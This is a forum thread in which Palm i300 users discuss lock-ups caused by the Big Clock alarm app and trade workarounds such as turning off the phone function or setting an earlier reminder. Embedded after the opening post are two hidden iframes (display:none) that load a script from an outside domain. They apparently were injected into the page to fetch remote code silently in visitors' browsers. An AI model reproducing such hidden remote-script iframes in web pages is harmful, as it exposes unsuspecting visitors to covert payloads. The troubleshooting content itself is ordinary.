+ Reply to Thread

Big Clock lock up?

Has anyone observed device lock-up with Big Clock? I noticed that if you leave the phone function on, Big Clock would wake up and "freeze" the device. Works fine when the phone function is off, or when the alarm is set to wake up shortly.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I noticed the same thing...

I moved away from BigClock because of it.... couldn't explain why it had problems. But it did the same for me when I set an overnight alarm one night.

-Doug

My experiences with big clock are that it will lock up if you set an alarm and leave the unit in the charger. Try setting an alarm and letting it go off when it is not in the charger. I have had no problems this way. Don't ask me why it doesn't work when it is in the cradle.

I've notice more lock-up since I loaded Big Clock too.... and I do not even set Big clock alarms.

Has anyone contacted the author of Big Clock?

Originally posted by MRussell
    My experiences with big clock are that it will lock up if you set an alarm and leave the unit in the charger. Try setting an alarm and letting it go off when it is not in the charger. I have had no problems this way. Don't ask me why it doesn't work when it is in the cradle.
    Mine works while in the cradle.

-Joel

Make sure you've got a current version of Big Clock - 2.8 is
    availaable for free from www.download.com in it's Palm OS software section.

There are many older versions floating around, some of the early ones developed for Palm OS 2.0 WILL cause lockups in Palm OS
    3.1 or better devices; I haven't had any problems with the new versions.

Installed 2.8.3 - the latest version, but this lock up still happens if you leave the phone function on, and the alarm is set to go off after a few hours of inactivity. Here's the solution:

1. Easy one: Turn the phone function off before bed time.

2. More complicated one: After setting the Big Clock alarm, set a regular Palm event with a reminder a minute before the Big Clock alarm. This way, BigClock won't lock up since the phone has an activity just shortly before the alarm.

- Charlie

I think I know why....

I think I know why this is happening. Big Clock usues the time function coded into the Palm OS. With the I300 this is updated through the cell signal. While I was out of the country with no cell service, I had no lock-up problems... Once I returned home, the lock-up started again.... so it was good bye big clock.
    Those who can... do.
    Those who can't... get a certification from Microsoft

Possibly. But it still works when the alarm is set to go off within a short range. Longer than 4 hours, and it definitely locks up. - Charlie

Administrator

Arrow

i used it on the 6035 and did not have the lock up issue....

i dont understand why so many are experiencing problems with BigClock. I have been using it for about a month now, with no problems. I have set alarms the night before the next morning (much more than four hours). knock on wood...

I300 crash with Big Clock arlarm

So, before going to sleep last night, I set both alarms in Big Clock. One for 9am, one for 9:30am.

When I work up at 10am, I noticed that the alarm had triggered, and the I300 was frozen. It looks like the Big Clock pop up was over the phone screen, and frozen that way. I had to do a soft reset.

I've never had a problem before, and haven't added anything new - certainly no hacks.

Any ideas? Or was it a fluke?

--
    David "late for the meeting" Gilman

I've crashed with Big Clock once before.
    I've also crashed with ZIO golf twice. If you've had it for a while now and this is your first crash, that isn't so bad.
    For those of you who have had the I300 for more than 3 months of adding apps and hacks who haven't experienced a crash.....consider yourself lucky. No more than Windows O/S will ever do in the same time frame.

same here

last friday on a business trip it froze with the screen saying alarm! but no sound ever went off. thank god for the wake up call i ordered.
    -gary

smartphonecentral.com
    I've had that happen several times in the last few weeks after using BigClock for a long time without incident. I'm not 100% sure I'm using the latest version though... I thought I saw that it had updated recently.

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

Application in one

There are many other apps with apps out there. The one I use and keep for all it's features is diddlebug. Do a search for some of its extras. Palmgear has the latest version, version 2.50.b.21. Of course it's not necessarily a great clock app, like big clock, but it's free, also, and has a great deal of additional uses (including the fun screen capture hack).